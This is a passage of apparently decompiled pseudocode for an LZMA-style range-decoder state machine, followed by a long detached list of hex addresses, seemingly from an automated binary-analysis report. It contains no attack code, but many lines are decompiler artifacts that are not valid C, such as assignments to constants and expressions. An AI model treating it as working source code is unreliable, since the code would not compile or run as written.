								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                                                                        0x00405f92
                                                                                                        0x00405f99
                                                                                                        0x00405f9f
                                                                                                        0x00405fa5
                                                                                                        0x00000000
                                                                                                        0x00405fa9
                                                                                                        0x00405fb5
                                                                                                        0x00405fb5
                                                                                                        0x00405fb5
                                                                                                        0x00405fbe
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fc4
                                                                                                        0x00000000
                                                                                                        0x00405fcb
                                                                                                        0x00405fcf
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fd8
                                                                                                        0x00405fdb
                                                                                                        0x00405fde
                                                                                                        0x00405fe0
                                                                                                        0x00405fe2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fe8
                                                                                                        0x00405feb
                                                                                                        0x00405fed
                                                                                                        0x00405fee
                                                                                                        0x00405ff1
                                                                                                        0x00405ff3
                                                                                                        0x00405ff4
                                                                                                        0x00405ff6
                                                                                                        0x00405ff9
                                                                                                        0x00405ffe
                                                                                                        0x00406003
                                                                                                        0x0040600c
                                                                                                        0x0040601f
                                                                                                        0x00406022
                                                                                                        0x0040602b
                                                                                                        0x0040602e
                                                                                                        0x00406056
                                                                                                        0x00406056
                                                                                                        0x00406058
                                                                                                        0x00406066
                                                                                                        0x00406066
                                                                                                        0x0040606a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040605a
                                                                                                        0x0040605a
                                                                                                        0x0040605d
                                                                                                        0x0040605d
                                                                                                        0x0040605e
                                                                                                        0x0040605e
                                                                                                        0x00000000
                                                                                                        0x0040605a
                                                                                                        0x00406030
                                                                                                        0x00406034
                                                                                                        0x00406039
                                                                                                        0x00406039
                                                                                                        0x00406042
                                                                                                        0x00406048
                                                                                                        0x0040604a
                                                                                                        0x0040604d
                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00406053
                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00000000
                                                                                                        0x00406070
                                                                                                        0x00406070
                                                                                                        0x00406074
                                                                                                        0x00406920
                                                                                                        0x00000000
                                                                                                        0x00406920
                                                                                                        0x0040607d
                                                                                                        0x0040608d
                                                                                                        0x00406090
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406096
                                                                                                        0x00406096
                                                                                                        0x0040609a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040609c
                                                                                                        0x0040609f
                                                                                                        0x004060a2
                                                                                                        0x004060cc
                                                                                                        0x004060d2
                                                                                                        0x004060d9
                                                                                                        0x00000000
                                                                                                        0x004060d9
                                                                                                        0x004060a4
                                                                                                        0x004060a8
                                                                                                        0x004060ab
                                                                                                        0x004060b0
                                                                                                        0x004060b0
                                                                                                        0x004060bb
                                                                                                        0x004060c1
                                                                                                        0x004060c3
                                                                                                        0x004060c6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040610b
                                                                                                        0x00406111
                                                                                                        0x00406114
                                                                                                        0x00406121
                                                                                                        0x00406129
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004060e0
                                                                                                        0x004060e0
                                                                                                        0x004060e4
                                                                                                        0x0040692f
                                                                                                        0x00000000
                                                                                                        0x0040692f
                                                                                                        0x004060f0
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fe
                                                                                                        0x00406101
                                                                                                        0x00406104
                                                                                                        0x00406107
                                                                                                        0x00406109
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004067a0
                                                                                                        0x004067a0
                                                                                                        0x004067a6
                                                                                                        0x004067ac
                                                                                                        0x004067af
                                                                                                        0x004067b2
                                                                                                        0x004067cc
                                                                                                        0x004067cf
                                                                                                        0x004067d5
                                                                                                        0x004067e0
                                                                                                        0x004067e0
                                                                                                        0x004067e2
                                                                                                        0x004067b4
                                                                                                        0x004067b4
                                                                                                        0x004067c3
                                                                                                        0x004067c7
                                                                                                        0x004067c7
                                                                                                        0x004067e5
                                                                                                        0x004067ec
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004067ee
                                                                                                        0x004067ee
                                                                                                        0x004067f2
                                                                                                        0x004069a1
                                                                                                        0x00000000
                                                                                                        0x004069a1
                                                                                                        0x004067fe
                                                                                                        0x00406805
                                                                                                        0x0040680d
                                                                                                        0x0040680d
                                                                                                        0x0040680d
                                                                                                        0x00406810
                                                                                                        0x00406813
                                                                                                        0x00406813
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406131
                                                                                                        0x00406133
                                                                                                        0x00406136
                                                                                                        0x004061a7
                                                                                                        0x004061aa
                                                                                                        0x004061ad
                                                                                                        0x004061b4
                                                                                                        0x004061be
                                                                                                        0x00000000
                                                                                                        0x004061be
                                                                                                        0x00406138
                                                                                                        0x0040613c
                                                                                                        0x0040613f
                                                                                                        0x00406141
                                                                                                        0x00406144
                                                                                                        0x00406147
                                                                                                        0x00406149
                                                                                                        0x0040614c
                                                                                                        0x0040614e
                                                                                                        0x00406153
                                                                                                        0x00406156
                                                                                                        0x00406159
                                                                                                        0x0040615d
                                                                                                        0x00406164
                                                                                                        0x00406167
                                                                                                        0x0040616e
                                                                                                        0x00406172
                                                                                                        0x0040617a
                                                                                                        0x0040617a
                                                                                                        0x0040617a
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x0040617e
                                                                                                        0x00406181
                                                                                                        0x0040619f
                                                                                                        0x004061a1
                                                                                                        0x00000000
                                                                                                        0x004061a1
                                                                                                        0x00406183
                                                                                                        0x00406186
                                                                                                        0x00406189
                                                                                                        0x0040618c
                                                                                                        0x0040618e
                                                                                                        0x0040618e
                                                                                                        0x0040618e
                                                                                                        0x00406191
                                                                                                        0x00406194
                                                                                                        0x00406196
                                                                                                        0x00406197
                                                                                                        0x0040619a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004063d0
                                                                                                        0x004063d4
                                                                                                        0x004063f2
                                                                                                        0x004063f5
                                                                                                        0x004063fc
                                                                                                        0x004063ff
                                                                                                        0x00406402
                                                                                                        0x00406405
                                                                                                        0x00406408
                                                                                                        0x0040640b
                                                                                                        0x0040640d
                                                                                                        0x00406414
                                                                                                        0x00406415
                                                                                                        0x00406417
                                                                                                        0x0040641a
                                                                                                        0x0040641d
                                                                                                        0x00406420
                                                                                                        0x00406420
                                                                                                        0x00406425
                                                                                                        0x00000000
                                                                                                        0x00406425
                                                                                                        0x004063d6
                                                                                                        0x004063d9
                                                                                                        0x004063dc
                                                                                                        0x004063e6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040643a
                                                                                                        0x0040643e
                                                                                                        0x00406461
                                                                                                        0x00406464
                                                                                                        0x00406467
                                                                                                        0x00406471
                                                                                                        0x00406440
                                                                                                        0x00406440
                                                                                                        0x00406443
                                                                                                        0x00406446
                                                                                                        0x00406449
                                                                                                        0x00406456
                                                                                                        0x00406459
                                                                                                        0x00406459
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040647d
                                                                                                        0x00406481
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406487
                                                                                                        0x0040648b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406491
                                                                                                        0x00406493
                                                                                                        0x00406497
                                                                                                        0x00406497
                                                                                                        0x0040649a
                                                                                                        0x0040649e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004064ee
                                                                                                        0x004064f2
                                                                                                        0x004064f9
                                                                                                        0x004064fc
                                                                                                        0x004064ff
                                                                                                        0x00406509
                                                                                                        0x00000000
                                                                                                        0x00406509
                                                                                                        0x004064f4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406515
                                                                                                        0x00406519
                                                                                                        0x00406520
                                                                                                        0x00406523
                                                                                                        0x00406526
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x00406529
                                                                                                        0x0040652c
                                                                                                        0x0040652f
                                                                                                        0x0040652f
                                                                                                        0x00406532
                                                                                                        0x00406535
                                                                                                        0x00406538
                                                                                                        0x00406538
                                                                                                        0x0040653b
                                                                                                        0x00406542
                                                                                                        0x00406547
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004065d5
                                                                                                        0x004065d5
                                                                                                        0x004065d9
                                                                                                        0x00406977
                                                                                                        0x00000000
                                                                                                        0x00406977
                                                                                                        0x004065df
                                                                                                        0x004065e2
                                                                                                        0x004065e5
                                                                                                        0x004065e9
                                                                                                        0x004065ec
                                                                                                        0x004065f2
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f7
                                                                                                        0x004065fa
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004061ca
                                                                                                        0x004061ca
                                                                                                        0x004061ce
                                                                                                        0x0040693b
                                                                                                        0x00000000
                                                                                                        0x0040693b
                                                                                                        0x004061d4
                                                                                                        0x004061d7
                                                                                                        0x004061da
                                                                                                        0x004061de
                                                                                                        0x004061e1
                                                                                                        0x004061e7
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061ec
                                                                                                        0x004061ef
                                                                                                        0x004061ef
                                                                                                        0x004061f2
                                                                                                        0x004061f5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004061fb
                                                                                                        0x00406201
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406207
                                                                                                        0x00406207
                                                                                                        0x0040620b
                                                                                                        0x0040620e
                                                                                                        0x00406211
                                                                                                        0x00406214
                                                                                                        0x00406217
                                                                                                        0x00406218
                                                                                                        0x0040621b
                                                                                                        0x0040621d
                                                                                                        0x00406223
                                                                                                        0x00406226
                                                                                                        0x00406229
                                                                                                        0x0040622c
                                                                                                        0x0040622f
                                                                                                        0x00406232
                                                                                                        0x00406235
                                                                                                        0x00406251
                                                                                                        0x00406254
                                                                                                        0x00406257
                                                                                                        0x0040625a
                                                                                                        0x00406261
                                                                                                        0x00406265
                                                                                                        0x00406267
                                                                                                        0x0040626b
                                                                                                        0x00406237
                                                                                                        0x00406237
                                                                                                        0x0040623b
                                                                                                        0x00406243
                                                                                                        0x00406248
                                                                                                        0x0040624a
                                                                                                        0x0040624c
                                                                                                        0x0040624c
                                                                                                        0x0040626e
                                                                                                        0x00406275
                                                                                                        0x00406278
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x00000000
                                                                                                        0x00406283
                                                                                                        0x00406283
                                                                                                        0x00406287
                                                                                                        0x00406947
                                                                                                        0x00000000
                                                                                                        0x00406947
                                                                                                        0x0040628d
                                                                                                        0x00406290
                                                                                                        0x00406293
                                                                                                        0x00406297
                                                                                                        0x0040629a
                                                                                                        0x004062a0
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a5
                                                                                                        0x004062a8
                                                                                                        0x004062a8
                                                                                                        0x004062a8
                                                                                                        0x004062ae
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004062b0
                                                                                                        0x004062b3
                                                                                                        0x004062b6
                                                                                                        0x004062b9
                                                                                                        0x004062bc
                                                                                                        0x004062bf
                                                                                                        0x004062c2
                                                                                                        0x004062c5
                                                                                                        0x004062c8
                                                                                                        0x004062cb
                                                                                                        0x004062ce
                                                                                                        0x004062e6
                                                                                                        0x004062e9
                                                                                                        0x004062ec
                                                                                                        0x004062ef
                                                                                                        0x004062ef
                                                                                                        0x004062f2
                                                                                                        0x004062f6
                                                                                                        0x004062f8
                                                                                                        0x004062d0
                                                                                                        0x004062d0
                                                                                                        0x004062d8
                                                                                                        0x004062dd
                                                                                                        0x004062df
                                                                                                        0x004062e1
                                                                                                        0x004062e1
                                                                                                        0x004062fb
                                                                                                        0x00406302
                                                                                                        0x00406305
                                                                                                        0x00000000
                                                                                                        0x00406307
                                                                                                        0x00000000
                                                                                                        0x00406307
                                                                                                        0x00406305
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406347
                                                                                                        0x00406347
                                                                                                        0x0040634b
                                                                                                        0x00406953
                                                                                                        0x00000000
                                                                                                        0x00406953
                                                                                                        0x00406351
                                                                                                        0x00406354
                                                                                                        0x00406357
                                                                                                        0x0040635b
                                                                                                        0x0040635e
                                                                                                        0x00406364
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406369
                                                                                                        0x0040636c
                                                                                                        0x0040636c
                                                                                                        0x00406372
                                                                                                        0x00406310
                                                                                                        0x00406310
                                                                                                        0x00406313
                                                                                                        0x00000000
                                                                                                        0x00406313
                                                                                                        0x00406374
                                                                                                        0x00406374
                                                                                                        0x00406377
                                                                                                        0x0040637a
                                                                                                        0x0040637d
                                                                                                        0x00406380
                                                                                                        0x00406383
                                                                                                        0x00406386
